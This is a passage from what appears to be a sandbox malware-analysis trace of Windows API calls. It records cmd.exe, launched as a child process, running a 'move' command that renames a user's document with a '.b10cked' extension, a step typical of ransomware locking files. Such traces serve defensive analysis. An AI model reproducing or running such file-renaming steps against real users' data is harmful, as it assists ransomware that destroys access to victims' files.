lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.375] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.375] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x32, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] GetFileType (hFile=0x4c) returned 0x1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] GetFileType (hFile=0x4c) returned 0x1 [0235.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.375] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x32, lpOverlapped=0x0) returned 1 [0235.375] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.375] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0235.375] _close (_FileHandle=4) returned 0 [0235.376] FindNextFileW (in: hFindFile=0x430eb8, lpFindFileData=0x2cf174 | out: lpFindFileData=0x2cf174) returned 0 [0235.376] GetLastError () returned 0x12 [0235.376] FindClose (in: hFindFile=0x430eb8 | out: hFindFile=0x430eb8) returned 1 [0235.376] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0235.377] _close (_FileHandle=3) returned 0 [0235.377] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.377] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.377] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.377] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.377] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0235.377] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.377] SetConsoleInputExeNameW () returned 0x1 [0235.377] GetConsoleOutputCP () returned 0x1b5 [0235.377] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.377] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.378] exit (_Code=0) Process: id = "629" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16340" os_pid = "0x9b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35018 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35019 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35020 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35021 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 35022 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 
0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35023 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35024 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35025 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35026 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 35027 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35258 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35259 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35260 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35261 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 35262 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 35263 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = 
mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35264 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35265 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35266 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35267 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35268 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35269 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35270 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35271 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35272 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000360000" filename = "" Region: id = 35273 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35274 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35275 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 35276 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 35277 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 35278 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 35279 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 35280 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 35281 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 871 os_tid = 0x2ac [0234.769] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f914 | out: lpSystemTimeAsFileTime=0x16f914*(dwLowDateTime=0xbf64ada0, dwHighDateTime=0x1d440a9)) [0234.769] GetCurrentProcessId () returned 0x9b0 [0234.769] GetCurrentThreadId () returned 0x2ac [0234.769] GetTickCount () returned 0x4078e [0234.769] QueryPerformanceCounter (in: lpPerformanceCount=0x16f90c | out: 
lpPerformanceCount=0x16f90c*=29155822242) returned 1 [0234.770] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.770] __set_app_type (_Type=0x1) [0234.770] __p__fmode () returned 0x76b331f4 [0234.770] __p__commode () returned 0x76b331fc [0234.770] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.770] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.770] GetCurrentThreadId () returned 0x2ac [0234.770] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x2ac) returned 0x38 [0234.770] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.770] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.770] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.770] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.770] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f8a4 | out: phkResult=0x16f8a4*=0x0) returned 0x2 [0234.770] VirtualQuery (in: lpAddress=0x16f8db, lpBuffer=0x16f874, dwLength=0x1c | out: lpBuffer=0x16f874*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.770] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f874, dwLength=0x1c | out: lpBuffer=0x16f874*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.770] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f874, dwLength=0x1c | out: lpBuffer=0x16f874*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) 
returned 0x1c [0234.770] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f874, dwLength=0x1c | out: lpBuffer=0x16f874*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.770] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f874, dwLength=0x1c | out: lpBuffer=0x16f874*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.771] GetConsoleOutputCP () returned 0x1b5 [0234.771] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.771] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.771] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.771] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.771] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.771] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.771] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.771] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.771] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.772] GetEnvironmentStringsW () returned 0x2701a8* [0234.772] FreeEnvironmentStringsW (penv=0x2701a8) returned 1 [0234.772] GetEnvironmentStringsW () returned 0x2701a8* [0234.772] FreeEnvironmentStringsW (penv=0x2701a8) returned 1 [0234.772] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e814 | out: phkResult=0x16e814*=0x40) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e81c, 
lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x0, lpData=0x16e820*=0xd0, lpcbData=0x16e818*=0x1000) returned 0x2 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x1, lpcbData=0x16e818*=0x4) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x0, lpData=0x16e820*=0x1, lpcbData=0x16e818*=0x1000) returned 0x2 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x0, lpcbData=0x16e818*=0x4) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x40, lpcbData=0x16e818*=0x4) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x40, lpcbData=0x16e818*=0x4) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x0, lpData=0x16e820*=0x40, lpcbData=0x16e818*=0x1000) returned 0x2 [0234.772] RegCloseKey (hKey=0x40) returned 0x0 [0234.772] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e814 | out: phkResult=0x16e814*=0x40) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x0, 
lpData=0x16e820*=0x40, lpcbData=0x16e818*=0x1000) returned 0x2 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x1, lpcbData=0x16e818*=0x4) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x0, lpData=0x16e820*=0x1, lpcbData=0x16e818*=0x1000) returned 0x2 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x0, lpcbData=0x16e818*=0x4) returned 0x0 [0234.772] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x9, lpcbData=0x16e818*=0x4) returned 0x0 [0234.773] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x4, lpData=0x16e820*=0x9, lpcbData=0x16e818*=0x4) returned 0x0 [0234.773] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x0, lpData=0x16e820*=0x9, lpcbData=0x16e818*=0x1000) returned 0x2 [0234.773] RegCloseKey (hKey=0x40) returned 0x0 [0234.773] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.773] srand (_Seed=0x5b8863c2) [0234.773] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked\"" [0234.773] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked\"" [0234.773] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.773] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x271908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.773] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.774] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.774] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.774] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.774] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.774] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.774] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.774] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.774] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.774] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.774] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.774] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.774] GetEnvironmentStringsW () returned 0x2722f8* [0234.774] FreeEnvironmentStringsW (penv=0x2722f8) returned 1 [0234.774] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.774] GetEnvironmentVariableW (in: lpName="KEYS", 
lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.774] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.774] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.774] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.774] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.774] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.774] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.774] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.774] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.774] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f5e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.774] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f5e0, lpFilePart=0x16f5dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f5dc*="Desktop") returned 0x18 [0234.774] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.774] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f35c | out: lpFindFileData=0x16f35c) returned 0x270038 [0234.775] FindClose (in: hFindFile=0x270038 | out: hFindFile=0x270038) returned 1 [0234.775] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f35c | out: lpFindFileData=0x16f35c) returned 0x270038 [0234.775] FindClose (in: hFindFile=0x270038 | out: hFindFile=0x270038) returned 1 [0234.775] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f35c | out: lpFindFileData=0x16f35c) returned 0x270038 [0234.775] FindClose (in: hFindFile=0x270038 | out: hFindFile=0x270038) returned 1 [0234.775] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.775] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" 
(normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.775] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.775] GetEnvironmentStringsW () returned 0x272b18* [0234.775] FreeEnvironmentStringsW (penv=0x272b18) returned 1 [0234.775] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.776] GetConsoleOutputCP () returned 0x1b5 [0234.776] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.776] GetUserDefaultLCID () returned 0x409 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f720, cchData=128 | out: lpLCData="0") returned 2 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f720, cchData=128 | out: lpLCData="0") returned 2 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f720, cchData=128 | out: lpLCData="1") returned 2 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.777] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.777] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.777] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.777] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.777] GetConsoleTitleW (in: lpConsoleTitle=0x2608f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.778] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.778] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.778] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.778] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.778] _wcsicmp (_String1="move", _String2=")") returned 68 [0234.778] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0234.778] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0234.778] _wcsicmp (_String1="IF", _String2="move") returned -4 [0234.778] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0234.778] _wcsicmp (_String1="REM", _String2="move") returned 5 [0234.778] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0234.781] GetConsoleTitleW (in: lpConsoleTitle=0x16f418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.781] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0234.781] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0234.781] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0234.781] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0234.781] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0234.781] _wcsicmp (_String1="move", _String2="CD") returned 10 [0234.782] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 
